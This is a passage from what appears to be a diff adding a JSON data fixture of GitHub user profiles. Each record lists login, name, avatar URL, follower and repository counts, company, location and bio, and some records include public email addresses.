"collaborators_count": 0, + "following_count": 7, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2019-01-11T15:52:31Z", + "updated_at": "2024-09-19T10:29:58Z", + "node_id": "MDQ6VXNlcjQ2NjAzNTcz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 635, + "fields": { + "nest_created_at": "2024-09-11T21:30:37.850Z", + "nest_updated_at": "2024-09-11T21:30:37.850Z", + "name": "", + "login": "Gslgaming231", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81898157?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-04-04T06:42:49Z", + "updated_at": "2023-10-24T08:57:46Z", + "node_id": "MDQ6VXNlcjgxODk4MTU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 636, + "fields": { + "nest_created_at": "2024-09-11T21:30:38.666Z", + "nest_updated_at": "2024-09-11T21:30:38.666Z", + "name": "", + "login": "serppower", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31936879?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-09-13T19:44:25Z", + "updated_at": "2024-09-02T17:40:53Z", + "node_id": "MDQ6VXNlcjMxOTM2ODc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 637, + "fields": { + "nest_created_at": "2024-09-11T21:30:39.549Z", + "nest_updated_at": "2024-09-11T21:30:39.549Z", + "name": "Luckygoyal", + "login": "Luckygoyal765", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/120254684?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-12-10T11:55:08Z", + "updated_at": "2024-08-21T16:57:15Z", + "node_id": "U_kgDOByrw3A", + "bio": "", + "is_hireable": false, + "twitter_username": "LuckyGoyal765" + } +}, +{ + "model": "github.user", + "pk": 638, + "fields": { + "nest_created_at": "2024-09-11T21:30:40.527Z", + "nest_updated_at": "2024-09-11T21:30:40.528Z", + "name": "", + "login": "Kalilele", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/152486132?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-30T09:25:37Z", + "updated_at": "2023-11-30T21:34:14Z", + "node_id": "U_kgDOCRbA9A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 639, + "fields": { + "nest_created_at": "2024-09-11T21:30:41.356Z", + "nest_updated_at": "2024-09-11T21:30:41.356Z", + "name": "", + "login": "Zeeshan0123", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/91839944?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2021-10-03T15:46:09Z", + "updated_at": "2024-09-08T08:28:37Z", + "node_id": "U_kgDOBXldyA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 640, + "fields": { + "nest_created_at": "2024-09-11T21:30:42.165Z", + "nest_updated_at": "2024-09-11T21:30:42.165Z", + "name": "", + "login": "Psychopath01", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/152803661?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-12-03T17:00:40Z", + "updated_at": "2024-09-05T12:45:05Z", + "node_id": "U_kgDOCRuZTQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 641, + "fields": { + "nest_created_at": "2024-09-11T21:30:42.964Z", + "nest_updated_at": "2024-09-11T21:30:42.964Z", + "name": "", + "login": "hacker-hypen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/153355002?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-12-09T08:40:20Z", + "updated_at": "2023-12-21T15:51:05Z", + "node_id": "U_kgDOCSQC-g", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 642, + "fields": { + "nest_created_at": "2024-09-11T21:30:43.777Z", + "nest_updated_at": "2024-09-11T21:30:43.777Z", + "name": "", + "login": "lunaal48", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44786716?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-11-05T20:19:06Z", + "updated_at": "2024-02-21T04:03:06Z", + "node_id": "MDQ6VXNlcjQ0Nzg2NzE2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 643, + "fields": { + "nest_created_at": "2024-09-11T21:30:44.589Z", + "nest_updated_at": "2024-09-11T21:30:45.428Z", + "name": "", + "login": "dr1408", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39735654?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-05-29T13:46:10Z", + "updated_at": "2024-05-01T20:36:13Z", + "node_id": "MDQ6VXNlcjM5NzM1NjU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 644, + "fields": { + "nest_created_at": "2024-09-11T21:30:46.247Z", + "nest_updated_at": "2024-09-11T21:30:46.247Z", + "name": "Ramgopal nk", + "login": "Rgnk25", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/134802535?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-05-27T17:31:26Z", + "updated_at": "2024-06-11T14:44:48Z", + "node_id": "U_kgDOCAjsZw", + "bio": "I am a cyber security Enthusiast and CTF player and learner at Tryhackme.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 645, + "fields": { + "nest_created_at": "2024-09-11T21:30:47.025Z", + "nest_updated_at": "2024-09-11T21:30:47.025Z", + "name": "", + "login": "Rocky-341", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/141387150?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-08-04T04:09:16Z", + "updated_at": "2024-07-18T13:58:30Z", + "node_id": "U_kgDOCG1ljg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 646, + "fields": { + "nest_created_at": "2024-09-11T21:30:47.853Z", + "nest_updated_at": "2024-09-11T21:30:47.853Z", + "name": "", + "login": "Services987", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/177706927?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-08-07T03:47:53Z", + "updated_at": "2024-08-07T03:48:32Z", + "node_id": "U_kgDOCpeXrw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 647, + "fields": { + "nest_created_at": "2024-09-11T21:30:48.659Z", + "nest_updated_at": "2024-09-11T21:30:48.659Z", + "name": "", + "login": "bmstu-stas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/162008713?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2024-03-03T07:53:40Z", + "updated_at": "2024-08-22T11:56:56Z", + "node_id": "U_kgDOCagOiQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 648, + "fields": { + "nest_created_at": "2024-09-11T21:30:49.478Z", + "nest_updated_at": "2024-09-11T21:30:49.478Z", + "name": "", + "login": "Ancientech01", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/180890174?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-09-08T23:46:12Z", + "updated_at": "2024-09-09T20:01:01Z", + "node_id": "U_kgDOCsgqPg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 649, + "fields": { + "nest_created_at": "2024-09-11T21:31:04.674Z", + "nest_updated_at": "2024-09-22T18:26:15.674Z", + "name": "Ashok Manda", + "login": "ask664", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12762732?v=4", + "company": "", + "location": "delhi india", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2015-06-05T12:50:56Z", + "updated_at": "2024-01-04T19:54:34Z", + "node_id": "MDQ6VXNlcjEyNzYyNzMy", + "bio": "ashokmanda30@gmail.com", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 650, + "fields": { + "nest_created_at": "2024-09-11T21:31:05.952Z", + "nest_updated_at": "2024-09-22T18:32:33.476Z", + "name": "Shivam Dixit", + "login": "shivamdixit", + "email": "shivamd001@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3061095?v=4", + "company": "Databricks", + "location": "Amsterdam, Netherlands", + "collaborators_count": 0, + "following_count": 59, + "followers_count": 229, + "public_gists_count": 4, + "public_repositories_count": 81, + "created_at": "2012-12-17T07:49:06Z", + "updated_at": "2024-06-14T14:01:50Z", + "node_id": "MDQ6VXNlcjMwNjEwOTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "shivamd001" + } +}, +{ + "model": "github.user", + "pk": 651, + "fields": { + "nest_created_at": "2024-09-11T21:31:19.581Z", + "nest_updated_at": "2024-09-22T18:26:32.419Z", + "name": "TashN", + "login": "tashjb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12991191?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 13, + "created_at": "2015-06-21T19:55:03Z", + "updated_at": "2020-05-27T19:54:34Z", + "node_id": "MDQ6VXNlcjEyOTkxMTkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 652, + "fields": { + "nest_created_at": "2024-09-11T21:31:24.173Z", + "nest_updated_at": "2024-09-11T21:31:24.173Z", + "name": "Brian Levine", + "login": "levinebw", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50513825?v=4", + "company": "@elastic ", + "location": "USA", + "collaborators_count": 0, + "following_count": 46, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2019-05-11T08:01:47Z", + "updated_at": "2024-09-11T15:12:40Z", + "node_id": "MDQ6VXNlcjUwNTEzODI1", + "bio": "", + "is_hireable": false, + "twitter_username": "brianlevinepm" + } +}, +{ + "model": "github.user", + "pk": 653, + "fields": { + "nest_created_at": "2024-09-11T21:31:56.068Z", + "nest_updated_at": "2024-09-11T21:31:56.068Z", + "name": "Stefan Streichsbier", + "login": "streichsbaer", + "email": "stefan@guardrails.io", + "avatar_url": "https://avatars.githubusercontent.com/u/5006784?v=4", + "company": "@guardrailsio ", + "location": "Remote", + "collaborators_count": 0, + "following_count": 89, + "followers_count": 72, + "public_gists_count": 16, + "public_repositories_count": 28, + "created_at": "2013-07-14T12:25:24Z", + "updated_at": "2024-08-09T15:49:27Z", + "node_id": "MDQ6VXNlcjUwMDY3ODQ=", + "bio": "Working on giving engineers security superpowers by combining #LLMs with #AppSec @guardrailsio ", + "is_hireable": false, + "twitter_username": "s_streichsbier" + } +}, +{ + "model": "github.user", + "pk": 654, + "fields": { + "nest_created_at": "2024-09-11T21:32:56.996Z", + "nest_updated_at": "2024-09-22T18:22:13.787Z", + "name": "", + "login": "talbacha", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7952575?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-06-21T19:51:10Z", + "updated_at": "2022-11-26T00:59:12Z", + "node_id": "MDQ6VXNlcjc5NTI1NzU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 655, + "fields": { + "nest_created_at": "2024-09-11T21:33:02.061Z", + "nest_updated_at": "2024-09-22T20:30:45.396Z", + "name": "Timo Pagel", + "login": "wurstbrot", + "email": "github@pagel.pro", + "avatar_url": "https://avatars.githubusercontent.com/u/955192?v=4", + "company": "Timo Pagel IT-Consulting", + "location": "Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 99, + "public_gists_count": 1, + "public_repositories_count": 96, + "created_at": "2011-08-02T22:16:20Z", + "updated_at": "2024-05-17T17:09:25Z", + "node_id": "MDQ6VXNlcjk1NTE5Mg==", + "bio": "I enable your team using modern technology in a secure way", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 656, + "fields": { + "nest_created_at": "2024-09-11T21:33:02.908Z", + "nest_updated_at": "2024-09-11T21:33:02.908Z", + "name": "", + "login": "tleish", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1099993?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 20, + "public_gists_count": 7, + "public_repositories_count": 83, + "created_at": "2011-10-03T20:34:38Z", + "updated_at": "2024-07-10T13:47:55Z", + "node_id": "MDQ6VXNlcjEwOTk5OTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 657, + "fields": { + "nest_created_at": "2024-09-11T21:33:11.441Z", + "nest_updated_at": "2024-09-22T18:33:20.142Z", + "name": "Cam Morris", + "login": "c-a-m", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1190407?v=4", + "company": "not telling ;)", + "location": "Salt Lake City", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2011-11-12T14:30:26Z", + "updated_at": "2024-08-01T13:56:25Z", + "node_id": "MDQ6VXNlcjExOTA0MDc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 658, + "fields": { + "nest_created_at": "2024-09-11T21:33:33.832Z", + "nest_updated_at": "2024-09-11T21:33:33.833Z", + "name": "Aaron Tesch", + "login": "attesch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2387067?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 43, + "created_at": "2012-09-20T15:59:01Z", + "updated_at": "2024-08-20T11:24:35Z", + "node_id": "MDQ6VXNlcjIzODcwNjc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 659, + "fields": { + "nest_created_at": "2024-09-11T21:33:37.190Z", + "nest_updated_at": "2024-09-22T18:27:10.914Z", + "name": "Alex Lock", + "login": "10dot", + "email": "alex@clanlock.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4081681?v=4", + "company": "", + "location": "Chicago, IL", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2013-04-07T03:58:11Z", + "updated_at": "2023-10-19T18:25:45Z", + "node_id": "MDQ6VXNlcjQwODE2ODE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 660, + "fields": { + "nest_created_at": "2024-09-11T21:33:48.519Z", + "nest_updated_at": "2024-09-11T21:33:48.519Z", + "name": "John Jediny", + "login": "JJediny", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6350035?v=4", + "company": "General Services Adminstration", + "location": "MA", + "collaborators_count": 0, + "following_count": 35, + "followers_count": 166, + "public_gists_count": 81, + "public_repositories_count": 691, + "created_at": "2014-01-08T14:35:10Z", + "updated_at": "2024-09-01T11:25:41Z", + "node_id": "MDQ6VXNlcjYzNTAwMzU=", + "bio": "Decade aged govy. Curious to many things", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 661, + "fields": { + "nest_created_at": "2024-09-11T21:33:52.285Z", + "nest_updated_at": "2024-09-11T21:33:52.285Z", + "name": "", + "login": "kmadhusudhan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5602017?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 25, + "created_at": "2013-10-03T09:19:17Z", + "updated_at": "2024-08-17T11:22:27Z", + "node_id": "MDQ6VXNlcjU2MDIwMTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 662, + "fields": { + "nest_created_at": "2024-09-11T21:33:54.344Z", + "nest_updated_at": "2024-09-11T21:33:54.344Z", + "name": "Jimmy Byrd", + "login": "TheAngryByrd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1490044?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 52, + "followers_count": 169, + "public_gists_count": 49, + "public_repositories_count": 192, + "created_at": "2012-03-01T21:40:39Z", + "updated_at": "2024-08-22T01:58:31Z", + "node_id": "MDQ6VXNlcjE0OTAwNDQ=", + "bio": "F# ", + "is_hireable": false, + "twitter_username": "jimmy_byrd" + } +}, +{ + "model": "github.user", + "pk": 663, + "fields": { + "nest_created_at": "2024-09-11T21:33:58.147Z", + "nest_updated_at": "2024-09-11T21:34:00.200Z", + "name": "", + "login": "runako", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12549448?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2015-05-21T18:26:50Z", + "updated_at": "2024-08-30T22:15:23Z", + "node_id": "MDQ6VXNlcjEyNTQ5NDQ4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 664, + "fields": { + "nest_created_at": "2024-09-11T21:34:06.186Z", + "nest_updated_at": "2024-09-11T21:34:06.186Z", + "name": "Rohil Subramanian", + "login": "s-rohil", + "email": "subramanian.roh@husky.neu.edu", + "avatar_url": "https://avatars.githubusercontent.com/u/25045737?v=4", + "company": "", + "location": "Boston", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2017-01-11T01:24:17Z", + "updated_at": "2020-01-22T17:35:27Z", + "node_id": "MDQ6VXNlcjI1MDQ1NzM3", + "bio": "I have started using GitHub to post the work that I have done as part of my Assignments and Projects of classes taken during and after Spring 2017.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 665, + "fields": { + "nest_created_at": "2024-09-11T21:34:20.793Z", + "nest_updated_at": "2024-09-11T21:34:20.793Z", + "name": "", + "login": "JStyle21", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6579137?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2014-02-03T21:44:46Z", + "updated_at": "2024-06-19T22:01:02Z", + "node_id": "MDQ6VXNlcjY1NzkxMzc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 666, + "fields": { + "nest_created_at": "2024-09-11T21:34:25.412Z", + "nest_updated_at": "2024-09-22T19:38:14.494Z", + "name": "Jose Guasch", + "login": "jaguasch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6979744?v=4", + "company": "Microsoft", + "location": "WA", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2014-03-17T20:19:13Z", + "updated_at": "2024-07-22T17:56:34Z", + "node_id": "MDQ6VXNlcjY5Nzk3NDQ=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 667, + "fields": { + "nest_created_at": "2024-09-11T21:34:27.882Z", + "nest_updated_at": "2024-09-11T21:34:27.882Z", + "name": "", + "login": "plech", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31850983?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-09-11T12:03:06Z", + "updated_at": "2019-03-20T09:47:40Z", + "node_id": "MDQ6VXNlcjMxODUwOTgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 668, + "fields": { + "nest_created_at": "2024-09-11T21:34:29.131Z", + "nest_updated_at": "2024-09-22T18:27:12.907Z", + "name": "Thomas Shipley", + "login": "tdshipley", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4574411?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 24, + "public_gists_count": 53, + "public_repositories_count": 21, + "created_at": "2013-05-30T21:06:55Z", + "updated_at": "2023-10-23T06:23:37Z", + "node_id": "MDQ6VXNlcjQ1NzQ0MTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "tomdrivendev" + } +}, +{ + "model": "github.user", + "pk": 669, + "fields": { + "nest_created_at": "2024-09-11T21:34:31.671Z", + "nest_updated_at": "2024-09-22T19:38:17.333Z", + "name": "", + "login": "dougmcdorman", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6043423?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2013-11-26T18:42:35Z", + "updated_at": "2024-05-04T19:37:05Z", + "node_id": "MDQ6VXNlcjYwNDM0MjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 670, + "fields": { + "nest_created_at": "2024-09-11T21:34:32.903Z", + "nest_updated_at": "2024-09-11T21:34:32.903Z", + "name": "", + "login": "hazana", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24461204?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2016-12-08T18:06:20Z", + "updated_at": "2024-06-15T14:06:15Z", + "node_id": "MDQ6VXNlcjI0NDYxMjA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 671, + "fields": { + "nest_created_at": "2024-09-11T21:34:34.150Z", + "nest_updated_at": "2024-09-22T18:27:15.099Z", + "name": "", + "login": "PastNullInfinity", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9055927?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 17, + "created_at": "2014-10-07T18:11:56Z", + "updated_at": "2024-09-19T15:55:05Z", + "node_id": "MDQ6VXNlcjkwNTU5Mjc=", + "bio": "Security engineer and Penetration tester.\r\n\r\nA modern day electron herder.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 672, + "fields": { + "nest_created_at": "2024-09-11T21:34:35.493Z", + "nest_updated_at": "2024-09-11T21:34:39.374Z", + "name": "Paweł Lech", + "login": "plech-sec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53973586?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-08-10T13:49:17Z", + "updated_at": "2024-04-21T00:44:44Z", + "node_id": "MDQ6VXNlcjUzOTczNTg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 673, + "fields": { + "nest_created_at": "2024-09-11T21:34:36.878Z", + "nest_updated_at": "2024-09-11T21:34:36.878Z", + "name": "fergalcoll", + "login": "fergalcoll", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17269499?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 13, + "created_at": "2016-02-16T09:57:38Z", + "updated_at": "2024-08-20T11:37:41Z", + "node_id": "MDQ6VXNlcjE3MjY5NDk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 674, + "fields": { + "nest_created_at": "2024-09-11T21:34:38.152Z", + "nest_updated_at": "2024-09-22T19:39:16.982Z", + "name": "Arthur Kay", + "login": "arthurakay", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/401229?v=4", + "company": "", + "location": "McHenry, IL", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 79, + "public_gists_count": 2, + "public_repositories_count": 59, + "created_at": "2010-09-16T00:59:07Z", + "updated_at": "2024-08-22T14:26:04Z", + "node_id": "MDQ6VXNlcjQwMTIyOQ==", + "bio": "Are you actually reading my bio?", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 675, + "fields": { + "nest_created_at": "2024-09-11T21:34:40.601Z", + "nest_updated_at": "2024-09-22T18:27:08.828Z", + "name": "", + "login": "bc-venkata", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37708250?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2018-03-23T16:49:11Z", + "updated_at": "2020-02-26T08:36:11Z", + "node_id": "MDQ6VXNlcjM3NzA4MjUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 676, + "fields": { + "nest_created_at": "2024-09-11T21:34:47.539Z", + "nest_updated_at": "2024-09-22T18:27:18.884Z", + "name": "gumpshroom", + "login": "gumpshroom", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43548339?v=4", + "company": "", + "location": "gumphome", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2018-09-24T16:37:59Z", + "updated_at": "2024-09-20T20:18:27Z", + "node_id": "MDQ6VXNlcjQzNTQ4MzM5", + "bio": "mushroom with gumps", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 677, + "fields": { + "nest_created_at": "2024-09-11T21:34:48.351Z", + "nest_updated_at": "2024-09-11T21:34:48.351Z", + "name": "", + "login": "BigRusBoss", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87097363?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 131, + "followers_count": 15, + "public_gists_count": 1, + "public_repositories_count": 28, + "created_at": "2021-07-07T20:59:55Z", + "updated_at": "2023-11-03T19:35:47Z", + "node_id": "MDQ6VXNlcjg3MDk3MzYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 678, + "fields": { + "nest_created_at": "2024-09-11T21:34:55.615Z", + "nest_updated_at": "2024-09-22T18:27:26.944Z", + "name": "Akash Trehan", + "login": "CodeMaxx", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14044709?v=4", + "company": "@microsoft | IIT Bombay | CMU | UCSB", + "location": "Seattle, USA", + "collaborators_count": 0, + "following_count": 62, + "followers_count": 437, + "public_gists_count": 2, + "public_repositories_count": 90, + "created_at": "2015-08-30T20:23:14Z", + "updated_at": "2024-09-13T12:44:25Z", + "node_id": "MDQ6VXNlcjE0MDQ0NzA5", + "bio": "Kernel Security Engineer 2 @ Microsoft, CS @ IIT Bombay, Security Research Intern at Carnegie Mellon SCS, \r\n@shellphish member", + "is_hireable": true, + "twitter_username": "cod3maxx" + } +}, +{ + "model": "github.user", + "pk": 679, + "fields": { + "nest_created_at": "2024-09-11T21:34:58.489Z", + "nest_updated_at": "2024-09-11T21:34:59.746Z", + "name": "Brian Beaudry", + "login": "sizzop", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10089864?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 25, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-12-05T17:01:52Z", + "updated_at": "2023-01-23T14:48:52Z", + "node_id": "MDQ6VXNlcjEwMDg5ODY0", + "bio": "", + "is_hireable": false, + "twitter_username": "sizzop" + } +}, +{ + "model": "github.user", + "pk": 680, + "fields": { + "nest_created_at": "2024-09-11T21:35:03.976Z", + "nest_updated_at": "2024-09-11T21:35:03.976Z", + "name": "Shivam Sharma", + "login": "jack17529", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15366183?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 22, + "public_gists_count": 1, + "public_repositories_count": 